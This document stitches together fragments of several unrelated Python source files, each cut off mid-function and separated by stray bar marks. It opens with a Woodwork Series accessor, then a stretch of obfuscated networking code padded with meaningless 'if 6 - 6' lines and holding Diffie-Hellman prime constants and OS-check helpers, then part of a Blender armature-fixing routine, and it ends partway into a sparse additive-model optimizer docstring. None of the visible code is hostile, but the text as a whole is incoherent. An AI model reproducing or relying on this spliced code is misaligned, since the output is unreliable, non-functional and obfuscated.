(str) If only one semantic tag is being set, a single string can be passed.
(list or set) If multiple tags are being set, a list or set of strings can be passed.
use_standard_tags (bool, optional): If True, will add standard semantic tags to the series
based on the inferred or specified logical type of the series. Defaults to True.
description (str, optional): Optional text describing the contents of the series.
origin (str, optional): Optional text specifying origin of the column (i.e. "base" or "engineered").
metadata (dict[str -> json serializable], optional): Metadata associated with the series.
schema (Woodwork.ColumnSchema, optional): Typing information to use for the Series instead of performing inference.
Any other arguments provided will be ignored. Note that any changes made to the schema object after
initialization will propagate to the Series. Similarly, to avoid unintended typing information changes,
the same schema object should not be shared between Series.
validate (bool, optional): Whether parameter and data validation should occur. Defaults to True. Warning:
Should be set to False only when parameters and data are known to be valid.
Any errors resulting from skipping validation with invalid inputs may not be easily understood.
"""
if schema is not None:
if validate:
_validate_schema(schema, self._series)
extra_params = []
if logical_type is not None:
extra_params.append("logical_type")
if semantic_tags is not None:
extra_params.append("semantic_tags")
if description is not None:
extra_params.append("description")
if origin is not None:
extra_params.append("origin")
if metadata is not None:
extra_params.append("metadata")
if not use_standard_tags:
extra_params.append("use_standard_tags")
if extra_params:
warnings.warn(
"A schema was provided and the following parameters were ignored: "
+ ", ".join(extra_params),
ParametersIgnoredWarning,
)
self._schema = schema
else:
logical_type = _get_column_logical_type(
self._series, logical_type, self._series.name
)
if validate:
self._validate_logical_type(logical_type)
self._schema = ColumnSchema(
logical_type=logical_type,
semantic_tags=semantic_tags,
use_standard_tags=use_standard_tags,
description=description,
origin=origin,
metadata=metadata,
validate=validate,
)
@property
def _series(self):
return self._series_weakref()
@property
def schema(self):
return copy.deepcopy(self._schema)
@property
@_check_column_schema
def nullable(self):
"""Whether the column can contain null values."""
dtype = self._schema.logical_type._get_valid_dtype(type(self._series))
return dtype in _NULLABLE_PHYSICAL_TYPES
@property
@_check_column_schema
def description(self):
"""The description of the series"""
return self._schema.description
@description.setter
@_check_column_schema
def description(self, description):
self._schema.description = description
@property
@_check_column_schema
def origin(self):
"""The origin of the series"""
return self._schema.origin
@origin.setter
@_check_column_schema
def origin(self, origin):
self._schema.origin = origin
@property
@_check_column_schema
def iloc(self):
"""
Integer-location based indexing for selection by position.
``.iloc[]`` is primarily integer position based (from ``0`` to
``length-1`` of the axis), but may also be used with a boolean array.
If the selection result is a Series, Woodwork typing information will
be initialized for the returned Series.
Allowed inputs are:
An integer, e.g. ``5``.
A list or array of integers, e.g. ``[4, 3, 0]``.
A slice object with ints, e.g. ``1:7``.
A boolean array.
A ``callable`` function with one argument (the calling Series, DataFrame
or Panel) and that returns valid output for indexing (one of the above).
This is useful in method chains, when you don't have a reference to the
calling object, but would like to base your selection on some value.
"""
return _iLocIndexer(self._series)
@property
@_check_column_schema
def loc(self):
"""
Access a group of rows by label(s) or a boolean array.
``.loc[]`` is primarily label based, but may also be used with a
boolean array.
If the selection result is a Series, Woodwork typing information will
be initialized for the returned Series.
Allowed inputs are:
A single label, e.g. ``5`` or ``'a'``, (note that ``5`` is
interpreted as a *label* of the index, and **never** as an
integer position along the index).
A list or array of labels, e.g. ``['a', 'b', 'c']``.
A slice object with labels, e.g. ``'a':'f'``.
A boolean array of the same length as the axis being sliced,
e.g. ``[True, False, True]``.
An alignable boolean Series. The index of the key will be aligned before
masking.
An alignable Index. The Index of the returned selection will be the input.
A ``callable`` function with one argument (the calling Series or
DataFrame) and that returns valid output for indexing (one of the above)
"""
return _locIndexer(self._series)
@property
@_check_column_schema
def logical_type(self):
"""The logical type of the series"""
return self._schema.logical_type
@property
@_check_column_schema
def metadata(self):
"""The metadata of the series"""
return self._schema.metadata
@metadata.setter
@_check_column_schema
def metadata(self, metadata):
self._schema.metadata = metadata
@property
@_check_column_schema
def semantic_tags(self):
"""The semantic tags assigned to the series"""
return self._schema.semantic_tags
@property
@_check_column_schema
def use_standard_tags(self):
return self._schema.use_standard_tags
def __eq__(self, other, deep=True):
if not self._schema.__eq__(other._schema, deep=deep):
return False
if self._series.name != other._series.name:
return False
if deep and isinstance(self._series, pd.Series):
return self._series.equals(other._series)
return True
@_check_column_schema
def __getattr__(self, attr):
# Called if method is not present on the Accessor
# If the method is present on Series, uses that method.
if hasattr(self._series, attr):
return self._make_series_call(attr)
else:
raise AttributeError(f"Woodwork has no attribute '{attr}'")
@_check_column_schema
def __repr__(self):
msg = "<Series: {} ".format(self._series.name)
msg += "(Physical Type = {}) ".format(self._series.dtype)
msg += "(Logical Type = {}) ".format(self.logical_type)
msg += "(Semantic Tags = {})>".format(self.semantic_tags)
return msg
def _make_series_call(self, attr):
"""Forwards the requested attribute onto the series object. Intercepts return value,
attempting to initialize Woodwork with the current schema when a new Series is returned.
Confirms schema is still valid for the original Series."""
series_attr = getattr(self._series, attr)
if callable(series_attr):
def wrapper(*args, **kwargs):
# Make Series call and intercept the result
result = series_attr(*args, **kwargs)
# Try to initialize Woodwork with the existing schema
if _is_series(result):
valid_dtype = self._schema.logical_type._get_valid_dtype(
type(result)
)
if str(result.dtype) == valid_dtype:
result.ww.init(schema=self.schema, validate=False)
else:
invalid_schema_message = (
"dtype mismatch between original dtype, "
f"{valid_dtype}, and returned dtype, {result.dtype}"
)
warning_message = (
TypingInfoMismatchWarning().get_warning_message(
attr, invalid_schema_message, "Series"
)
)
warnings.warn(warning_message, TypingInfoMismatchWarning)
elif _is_dataframe(result):
# Initialize Woodwork with a partial schema
col_schema = self.schema
col_name = self.name or result.columns.to_list()[0]
table_schema = TableSchema(
column_names=[col_name],
logical_types={col_name: col_schema.logical_type},
semantic_tags={col_name: col_schema.semantic_tags},
column_metadata={col_name: col_schema.metadata},
use_standard_tags={col_name: col_schema.use_standard_tags},
column_descriptions={col_name: col_schema.description},
column_origins={col_name: col_schema.origin},
validate=False,
)
result.ww.init_with_partial_schema(table_schema)
# Always return the results of the Series operation whether or not Woodwork is initialized
return result
return wrapper
# Directly return non-callable Series attributes
return series_attr
def _validate_logical_type(self, logical_type):
"""Validates that a logical type is consistent with the series dtype. Performs additional type
specific validation, as required."""
valid_dtype = logical_type._get_valid_dtype(type(self._series))
if valid_dtype != str(self._series.dtype):
raise ValueError(
f"Cannot initialize Woodwork. Series dtype '{self._series.dtype}' is "
f"incompatible with {logical_type} dtype. Try converting series "
f"dtype to '{valid_dtype}' before initializing or use the "
"woodwork.init_series function to initialize."
)
if isinstance(logical_type, Ordinal):
logical_type._validate_data(self._series)
elif isinstance(logical_type, LatLong):
if not _is_valid_latlong_series(self._series):
raise ValueError(
"Cannot initialize Woodwork. Series does not contain properly formatted "
"LatLong data. Try reformatting before initializing or use the "
"woodwork.init_series function to initialize."
)
@_check_column_schema
def add_semantic_tags(self, semantic_tags):
"""Add the specified semantic tags to the set of tags.
Args:
semantic_tags (str/list/set): New semantic tag(s) to add
"""
self._schema._add_semantic_tags(semantic_tags, self._series.name)
@_check_column_schema
def remove_semantic_tags(self, semantic_tags):
"""Removes specified semantic tags from the current tags.
Args:
semantic_tags (str/list/set): Semantic tag(s) to remove.
"""
self._schema._remove_semantic_tags(semantic_tags, self._series.name)
@_check_column_schema
def reset_semantic_tags(self):
"""Reset the semantic tags to the default values. The default values
will be either an empty set or a set of | |
% i1IIi / IiII
if 6 - 6: iII111i / I1IiiI % OOooOOo - I1IiiI
if 31 - 31: OOooOOo
if 23 - 23: I1Ii111 . IiII
if 92 - 92: OoOoOO00 + I1Ii111 * Ii1I % I1IiiI
if 42 - 42: Oo0Ooo
if 76 - 76: I1IiiI * iII111i % I1Ii111
if 57 - 57: iIii1I11I1II1 - i1IIi / I1Ii111 - O0 * OoooooooOO % II111iiii
if 68 - 68: OoooooooOO * I11i % OoOoOO00 - IiII
if 34 - 34: I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / I1Ii111 / I1ii11iIi11i
if 78 - 78: Oo0Ooo - o0oOOo0O0Ooo / OoOoOO00
if 10 - 10: iII111i + Oo0Ooo * I1ii11iIi11i + iIii1I11I1II1 / I1Ii111 / I1ii11iIi11i
if 42 - 42: I1IiiI
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
if 69 - 69: IiII - O0 % I1ii11iIi11i + i11iIiiIii . OoOoOO00 / OoO0O00
if 79 - 79: O0 * i11iIiiIii - IiII / IiII
if 48 - 48: O0
if 93 - 93: i11iIiiIii - I1IiiI * I1ii11iIi11i * I11i % O0 + OoooooooOO
if 25 - 25: IiII + Ii1I / ooOoO0o . o0oOOo0O0Ooo % O0 * OoO0O00
if 84 - 84: ooOoO0o % Ii1I + i11iIiiIii
if 28 - 28: Oo0Ooo + OoO0O00 * OOooOOo % oO0o . I11i % O0
if 16 - 16: I11i - iIii1I11I1II1 / I1IiiI . II111iiii + iIii1I11I1II1
if 19 - 19: OoO0O00 - Oo0Ooo . O0
if 60 - 60: II111iiii + Oo0Ooo
if 9 - 9: ooOoO0o * OoooooooOO - iIii1I11I1II1 + OoOoOO00 / OoO0O00 . OoO0O00
if 49 - 49: II111iiii
if 25 - 25: OoooooooOO - I1IiiI . I1IiiI * oO0o
if 81 - 81: iII111i + IiII
if 98 - 98: I1IiiI
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
if 95 - 95: ooOoO0o / ooOoO0o
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
if 30 - 30: I1ii11iIi11i + Oo0Ooo / Oo0Ooo % I1ii11iIi11i . I1ii11iIi11i
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
if 55 - 55: ooOoO0o - I11i + II111iiii + iII111i % Ii1I
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
if 41 - 41: i1IIi - I11i - Ii1I
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
if 8 - 8: OoO0O00 + I1Ii111 - o0oOOo0O0Ooo % Oo0Ooo % o0oOOo0O0Ooo * oO0o
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
if 9 - 9: Oo0Ooo - i11iIiiIii - OOooOOo * Ii1I + ooOoO0o
if 44 - 44: II111iiii
if 52 - 52: I1ii11iIi11i - Oo0Ooo + I1ii11iIi11i % o0oOOo0O0Ooo
if 35 - 35: iIii1I11I1II1
if 42 - 42: I1Ii111 . I1IiiI . i1IIi + OoOoOO00 + OOooOOo + I1IiiI
if 31 - 31: iII111i . OOooOOo - ooOoO0o . OoooooooOO / OoooooooOO
if 56 - 56: OoO0O00 / oO0o / i11iIiiIii + OoooooooOO - Oo0Ooo - I11i
if 21 - 21: O0 % IiII . I1IiiI / II111iiii + IiII
def lisp_record_traceback ( * args ) :
OOOO0O00o = datetime . datetime . now ( ) . strftime ( "%m/%d/%y %H:%M:%S.%f" ) [ : - 3 ]
ooo = open ( "./logs/lisp-traceback.log" , "a" )
ooo . write ( "---------- Exception occurred: {} ----------\n" . format ( OOOO0O00o ) )
try :
traceback . print_last ( file = ooo )
except :
ooo . write ( "traceback.print_last(file=fd) failed" )
if 19 - 19: OoO0O00 - Oo0Ooo . oO0o / oO0o % ooOoO0o
try :
traceback . print_last ( )
except :
print ( "traceback.print_last() failed" )
if 56 - 56: I1IiiI . O0 + Oo0Ooo
ooo . close ( )
return
if 1 - 1: iII111i
if 97 - 97: OOooOOo + iII111i + O0 + i11iIiiIii
if 77 - 77: o0oOOo0O0Ooo / OoooooooOO
if 46 - 46: o0oOOo0O0Ooo % iIii1I11I1II1 . iII111i % iII111i + i11iIiiIii
if 72 - 72: iIii1I11I1II1 * Ii1I % ooOoO0o / OoO0O00
if 35 - 35: ooOoO0o + i1IIi % I1ii11iIi11i % I11i + oO0o
if 17 - 17: i1IIi
def lisp_set_exception ( ) :
sys . excepthook = lisp_record_traceback
return
if 21 - 21: Oo0Ooo
if 29 - 29: I11i / II111iiii / ooOoO0o * OOooOOo
if 10 - 10: I1Ii111 % IiII * IiII . I11i / Ii1I % OOooOOo
if 49 - 49: OoO0O00 / oO0o + O0 * o0oOOo0O0Ooo
if 28 - 28: ooOoO0o + i11iIiiIii / I11i % OoOoOO00 % Oo0Ooo - O0
if 54 - 54: i1IIi + II111iiii
if 83 - 83: I1ii11iIi11i - I1IiiI + OOooOOo
def lisp_is_raspbian ( ) :
if ( platform . dist ( ) [ 0 ] != "debian" ) : return ( False )
return ( platform . machine ( ) in [ "armv6l" , "armv7l" ] )
if 5 - 5: Ii1I
if 46 - 46: IiII
if 45 - 45: ooOoO0o
if 21 - 21: oO0o . I1Ii111 . OOooOOo / Oo0Ooo / I1Ii111
if 17 - 17: OOooOOo / OOooOOo / I11i
if 1 - 1: i1IIi . i11iIiiIii % OOooOOo
if 82 - 82: iIii1I11I1II1 + Oo0Ooo . iIii1I11I1II1 % IiII / Ii1I . Ii1I
def lisp_is_ubuntu ( ) :
return ( platform . dist ( ) [ 0 ] == "Ubuntu" )
if 14 - 14: o0oOOo0O0Ooo . OOooOOo . I11i + OoooooooOO - OOooOOo + IiII
if 9 - 9: Ii1I
if 59 - 59: I1IiiI * II111iiii . O0
if 56 - 56: Ii1I - iII111i % I1IiiI - o0oOOo0O0Ooo
if 51 - 51: O0 / ooOoO0o * iIii1I11I1II1 + I1ii11iIi11i + o0oOOo0O0Ooo
if 98 - 98: iIii1I11I1II1 * I1ii11iIi11i * OOooOOo + ooOoO0o % i11iIiiIii % O0
if 27 - 27: O0
def lisp_is_fedora ( ) :
return ( platform . dist ( ) [ 0 ] == "fedora" )
if 79 - 79: o0oOOo0O0Ooo - I11i + o0oOOo0O0Ooo . oO0o
if 28 - 28: i1IIi - iII111i
if 54 - 54: iII111i - O0 % OOooOOo
if 73 - 73: O0 . OoOoOO00 + I1IiiI - I11i % I11i . I11i
if 17 - 17: Ii1I - OoooooooOO % Ii1I . IiII / i11iIiiIii % iII111i
if 28 - 28: I11i
if 58 - 58: OoOoOO00
def lisp_is_centos ( ) :
return ( platform . dist ( ) [ 0 ] == "centos" )
if 37 - 37: Oo0Ooo - iIii1I11I1II1 / I1ii11iIi11i
if 73 - 73: i11iIiiIii - IiII
if 25 - 25: OoooooooOO + IiII * I1ii11iIi11i
if 92 - 92: I1IiiI + I11i + O0 / o0oOOo0O0Ooo + I1Ii111
if 18 - 18: ooOoO0o * OoOoOO00 . iII111i / I1ii11iIi11i / i11iIiiIii
if 21 - 21: oO0o / I1ii11iIi11i + Ii1I + OoooooooOO
if 91 - 91: i11iIiiIii / i1IIi + iII111i + ooOoO0o * i11iIiiIii
def lisp_is_debian ( ) :
return ( platform . dist ( ) [ 0 ] == "debian" )
if 66 - 66: iIii1I11I1II1 % i1IIi - O0 + I11i * I1Ii111 . IiII
if 52 - 52: ooOoO0o + O0 . iII111i . I1ii11iIi11i . OoO0O00
if 97 - 97: I1IiiI / iII111i
if 71 - 71: II111iiii / i1IIi . I1ii11iIi11i % OoooooooOO . OoOoOO00
if 41 - 41: i1IIi * II111iiii / OoooooooOO . OOooOOo
if 83 - 83: iII111i . O0 / Oo0Ooo / OOooOOo - II111iiii
if 100 - 100: OoO0O00
def lisp_is_debian_kali ( ) :
return ( platform . dist ( ) [ 0 ] == "Kali" )
if 46 - 46: OoOoOO00 / iIii1I11I1II1 % iII111i . iIii1I11I1II1 * iII111i
if 38 - 38: I1ii11iIi11i - iII111i / O0 . I1Ii111
if 45 - 45: I1Ii111
if 83 - 83: OoOoOO00 . OoooooooOO
if 58 - 58: i11iIiiIii + OoooooooOO % OoooooooOO / IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if 7 - 7: OoooooooOO . IiII
def lisp_is_macos | |
hips bone is not below the legs bone
# hip_bone_length = abs(hips.tail[z_cord] - hips.head[z_cord])
# hips.head[z_cord] = right_leg.head[z_cord]
# hips.tail[z_cord] = hips.head[z_cord] + hip_bone_length
# hips.head[z_cord] = right_leg.head[z_cord]
# hips.tail[z_cord] = spine.head[z_cord]
# if hips.tail[z_cord] < hips.head[z_cord]:
# hips.tail[z_cord] = hips.tail[z_cord] + 0.1
# elif spine and chest and neck and head:
# bones = [hips, spine, chest, neck, head]
# for bone in bones:
# bone_length = abs(bone.tail[z_cord] - bone.head[z_cord])
# bone.tail[x_cord] = bone.head[x_cord]
# bone.tail[y_cord] = bone.head[y_cord]
# bone.tail[z_cord] = bone.head[z_cord] + bone_length
else:
if left_leg and left_knee and right_leg and right_knee:
hips.head[x_cord] = 0
hips.tail[x_cord] = 0
hips.tail[y_cord] = hips.head[y_cord]
hips.head[z_cord] = spine.head[z_cord]
hips.tail[z_cord] = right_leg.head[z_cord]
left_leg_top = armature.data.edit_bones.new('Left leg top')
right_leg_top = armature.data.edit_bones.new('Right leg top')
left_leg_top.head = left_leg.head
left_leg_top.tail = left_leg.head
left_leg_top.tail[z_cord] = left_leg.head[z_cord] + 0.1
right_leg_top.head = right_leg.head
right_leg_top.tail = right_leg.head
right_leg_top.tail[z_cord] = right_leg.head[z_cord] + 0.1
spine.head = hips.head
# hips.head[z_cord] -= 0.0025
# spine.head[z_cord] += 0.0025
left_leg.name = "Left leg 2"
right_leg.name = "Right leg 2"
left_leg_top.name = "Left leg"
right_leg_top.name = "Right leg"
left_leg_top.parent = hips
right_leg_top.parent = hips
left_leg.parent = left_leg_top
right_leg.parent = right_leg_top
left_knee.parent = left_leg_top
right_knee.parent = right_leg_top
# # Fixing legs
# right_knee = armature.data.edit_bones.get('Right knee')
# left_knee = armature.data.edit_bones.get('Left knee')
# if right_knee and left_knee:
# # Make sure the upper legs tail are the same x/y values as the lower leg tail x/y
# right_leg.tail[x_cord] = right_leg.head[x_cord]
# left_leg.tail[x_cord] = left_knee.head[x_cord]
# right_leg.head[y_cord] = right_knee.head[y_cord]
# left_leg.head[y_cord] = left_knee.head[y_cord]
#
# # Make sure the leg bones are setup straight. (head should be same X as tail)
# left_leg.head[x_cord] = left_leg.tail[x_cord]
# right_leg.head[x_cord] = right_leg.tail[x_cord]
#
# # Make sure the left legs (head tip) have the same Y values as right leg (head tip)
# left_leg.head[y_cord] = right_leg.head[y_cord]
# Function: Reweight all eye children into the eyes
def add_eye_children(eye_bone, parent_name):
for eye in eye_bone.children:
temp_list_reweight_bones[eye.name] = parent_name
add_eye_children(eye, parent_name)
# Reweight all eye children into the eyes
for eye_name in ['Eye_L', 'Eye_R']:
if eye_name in armature.data.edit_bones:
eye = armature.data.edit_bones.get(eye_name)
add_eye_children(eye, eye.name)
# Rotate if on head and not fbx (Unreal engine model)
if 'Hips' in armature.data.edit_bones:
hips = armature.pose.bones.get('Hips')
obj = hips.id_data
matrix_final = obj.matrix_world * hips.matrix
# print(matrix_final)
# print(matrix_final[2][3])
# print(fbx)
if not fbx and matrix_final[2][3] < 0:
# print(hips.head[0], hips.head[1], hips.head[2])
# Rotation of -180 around the X-axis
rot_x_neg180 = Matrix.Rotation(-math.pi, 4, 'X')
armature.matrix_world = rot_x_neg180 * armature.matrix_world
mesh.rotation_euler = (math.radians(180), 0, 0)
# Fixes bones disappearing, prevents bones from having their tail and head at the exact same position
for bone in armature.data.edit_bones:
if round(bone.head[x_cord], 5) == round(bone.tail[x_cord], 5)\
and round(bone.head[y_cord], 5) == round(bone.tail[y_cord], 5)\
and round(bone.head[z_cord], 5) == round(bone.tail[z_cord], 5):
if bone.name == 'Hips' and full_body_tracking:
bone.tail[z_cord] -= 0.1
else:
bone.tail[z_cord] += 0.1
# Mixing the weights
tools.common.unselect_all()
tools.common.switch('OBJECT')
tools.common.select(mesh)
# for bone_name in temp_rename_bones.keys():
# bone = armature.data.bones.get(bone_name)
# if bone:
# print(bone_name)
# bone.hide = False
for bone_new, bones_old in temp_reweight_bones.items():
if '\Left' in bone_new or '\L' in bone_new:
bones = [[bone_new.replace('\Left', 'Left').replace('\left', 'left').replace('\L', 'L').replace('\l', 'l'), ''],
[bone_new.replace('\Left', 'Right').replace('\left', 'right').replace('\L', 'R').replace('\l', 'r'), '']]
else:
bones = [[bone_new, '']]
for bone_old in bones_old:
if '\Left' in bone_new or '\L' in bone_new:
bones[0][1] = bone_old.replace('\Left', 'Left').replace('\left', 'left').replace('\L', 'L').replace('\l', 'l')
bones[1][1] = bone_old.replace('\Left', 'Right').replace('\left', 'right').replace('\L', 'R').replace('\l', 'r')
else:
bones[0][1] = bone_old
for bone in bones: # bone[0] = new name, bone[1] = old name
current_step += 1
wm.progress_update(current_step)
# Seach for vertex group
vg = None
for vg_tmp in mesh.vertex_groups:
if vg_tmp.name.lower() == bone[1].lower():
vg = vg_tmp
break
# Cancel if vertex group was not found
if not vg:
continue
if bone[0] == vg.name:
print('BUG: ' + bone[0] + ' tried to mix weights with itself!')
continue
# print(bone[1] + " to1 " + bone[0])
# If important vertex group is not there create it
if mesh.vertex_groups.get(bone[0]) is None:
if bone[0] in Bones.dont_delete_these_bones and bone[0] in armature.data.bones:
bpy.ops.object.vertex_group_add()
mesh.vertex_groups.active.name = bone[0]
if mesh.vertex_groups.get(bone[0]) is None:
continue
else:
continue
bone_tmp = armature.data.bones.get(vg.name)
if bone_tmp:
for child in bone_tmp.children:
if not temp_list_reparent_bones.get(child.name):
temp_list_reparent_bones[child.name] = bone[0]
# print(bone[1] + " to " + bone[0])
tools.common.mix_weights(mesh, vg.name, bone[0])
# Old mixing weights. Still important
for key, value in temp_list_reweight_bones.items():
current_step += 1
wm.progress_update(current_step)
# Search for vertex groups
vg_from = None
vg_to = None
for vg_tmp in mesh.vertex_groups:
if vg_tmp.name.lower() == key.lower():
vg_from = vg_tmp
if vg_to:
break
elif vg_tmp.name.lower() == value.lower():
vg_to = vg_tmp
if vg_from:
break
# Cancel if vertex groups was not found
if not vg_from or not vg_to:
continue
bone_tmp = armature.data.bones.get(vg_from.name)
if bone_tmp:
for child in bone_tmp.children:
if not temp_list_reparent_bones.get(child.name):
temp_list_reparent_bones[child.name] = vg_to.name
if vg_from.name == vg_to.name:
print('BUG: ' + vg_to.name + ' tried to mix weights with itself!')
continue
# Mix the weights
# print(vg_from.name, 'into', vg_to.name)
tools.common.mix_weights(mesh, vg_from.name, vg_to.name)
tools.common.unselect_all()
tools.common.select(armature)
tools.common.switch('EDIT')
# Reparent all bones to be correct for unity mapping and vrc itself
for key, value in temp_list_reparent_bones.items():
# current_step += 1
# wm.progress_update(current_step)
if key in armature.data.edit_bones and value in armature.data.edit_bones:
armature.data.edit_bones.get(key).parent = armature.data.edit_bones.get(value)
# Bone constraints should be deleted
# if context.scene.remove_constraints:
tools.common.delete_bone_constraints()
# Removes unused vertex groups
tools.common.remove_unused_vertex_groups()
# Zero weight bones should be deleted
if context.scene.remove_zero_weight:
tools.common.delete_zero_weight()
# # This is code for testing
# print('LOOKING FOR BONES!')
# if 'Head' in tools.common.get_armature().pose.bones:
# print('THEY ARE THERE!')
# else:
# print('NOT FOUND!!!!!!')
# return {'FINISHED'}
# At this point, everything should be fixed and now we validate and give errors if needed
# The bone hierarchy needs to be validated
hierarchy_check_hips = check_hierarchy(False, [
['Hips', 'Spine', 'Chest', 'Neck', 'Head'],
['Hips', 'Left leg', 'Left knee', 'Left ankle'],
['Hips', 'Right leg', 'Right knee', 'Right ankle'],
['Chest', 'Left shoulder', 'Left arm', 'Left elbow', 'Left wrist'],
['Chest', 'Right shoulder', 'Right arm', 'Right elbow', 'Right wrist']
])
# Armature should be named correctly (has to be at the end because of multiple armatures)
tools.common.fix_armature_names()
# Fix shading (check for runtime error because of ci tests)
if not source_engine:
try:
bpy.ops.mmd_tools.set_shadeless_glsl_shading()
except RuntimeError:
pass
wm.progress_end()
if not hierarchy_check_hips['result']:
self.report({'ERROR'}, hierarchy_check_hips['message'])
return {'FINISHED'}
if fixed_uv_coords:
tools.common.show_error(6.2, ['The model was successfully fixed, but there were ' + str(fixed_uv_coords) + ' faulty UV coordinates.',
'This could result in broken textures and you might have to fix them manually.',
'This issue is often caused by edits in PMX editor.'])
return {'FINISHED'}
self.report({'INFO'}, 'Model successfully fixed.')
return {'FINISHED'}
def check_hierarchy(check_parenting, correct_hierarchy_array):
armature = tools.common.set_default_stage()
missing_bones = []
missing2 = ['The following bones were not found:', '']
for correct_hierarchy in correct_hierarchy_array: # For each hierarchy array
line = ' - '
for index, bone in enumerate(correct_hierarchy): # For each hierarchy bone item
if bone not in missing_bones and bone not in armature.data.bones:
missing_bones.append(bone)
if len(line) > 3:
line += ', '
line += bone
if len(line) > 3:
missing2.append(line)
if len(missing2) > 2 and not check_parenting:
missing2.append('')
missing2.append('Looks like you found a model which Cats could not fix!')
missing2.append('If this is a non modified model we would love to make it compatible.')
missing2.append('Report it to us in the forum or in our discord, links can be found in the Credits panel.')
tools.common.show_error(6.4, missing2)
return {'result': True, 'message': ''}
if check_parenting:
for correct_hierarchy in correct_hierarchy_array: # For each hierachy array
previous = None
for index, bone in enumerate(correct_hierarchy): # For each hierarchy bone item
if index > 0:
previous = correct_hierarchy[index - 1]
if bone in armature.data.bones:
bone = armature.data.bones[bone]
# If a previous item was found
if previous is not None:
# And there is no parent, then we have a problem mkay
if bone.parent is None:
return {'result': False, 'message': bone.name + ' is not parented at all, this will cause problems!'}
# Previous needs to be the parent of the current item
if previous != bone.parent.name:
return {'result': False, 'message': bone.name + ' is not parented to ' + previous + ', this will | |
<filename>SparseAMsWithInteractions/src/AMsWithInteractionsL0/optimizer.py
from copy import deepcopy
from IPython.display import Math
from ipywidgets import *
import numpy as np
import scipy.sparse as sp
from scipy.special import comb
from sklearn.metrics import mean_squared_error
from tqdm import notebook
import warnings
from SparseAMsWithInteractions.src.AMsWithInteractionsL0 import utilities
def CD_Joint_ActiveSet(Ypred = None,
beta = None,
zeta = None,
active_set = None,
lam = None,
P = None,
P_interaction = None,
Y = None,
B = None,
B_interaction = None,
S = None,
S_interaction = None,
I = None,
interaction_terms = None,
r = None,
max_iter = None,
tol = 1e-4,
verbose=False,
path = None):
"""Cyclic Block Coordinate Descent over active set.
Args:
Ypred: current prediction, numpy array of shape (N, ).
beta: coefficients for main/interaction effects, 2 lists of arrays of shapes [ [(Ki+1, 1), ...], [(Kij+1, 1), ...]]
zeta: binary vector to track which main effects are in the active set, 2 bool arrays of shape [(1, d), (1, Imax)]
active_set: indices of main effects to optimize over, a numpy int array.
lam: regularization parameters [lam_1, lam_2], list of floats.
P: B^T*B + 2*N*(lam_1*S_i + eps*I) matrices for main effects, list of sparse matrices of shapes [(Ki+1, Ki+1), ...].
eps is a small epsilon for numerical stability.
P_interaction: B^T*B + 2*N*(lam_1*S_ij + eps*I) matrices for main effects, list of sparse matrices of shapes [(Kij+1, Kij+1), ...].
eps is a small epsilon for numerical stability.
B: B-spline transformed sparse matrices for main effects, list of sparse matrices of shapes [(N, Ki+1), ...].
B_interaction: B-spline transformed sparse matrices for interaction effects, list of sparse matrices of shapes [(N, Kij+1), ...].
S: Smoothness matrices for main effects, list of sparse matrices of shapes [(Ki+1, Ki+1), ...].
S_interaction: Smoothness matrices for interaction effects, list of sparse matrices of shapes [(Kij+1, Kij+1), ...].
I: number of possible main and interaction effects, int scalers.
Y: training target responses, a float numpy array of shape (N,).
interaction_terms: list of interaction effects to consider if only a subset need to be considered,
a 2D numpy array of of shape (Imax, 2).
max_iter: maximum number of Cyclic BCD on the active set, int scaler.
tol: relative loss termination criteria for stopping, a float scalar.
verbose: for printing optimization steps, bool scaler.
path: for logging, str.
Returns:
Ypred: Updated prediction, numpy array of shape (N, ).
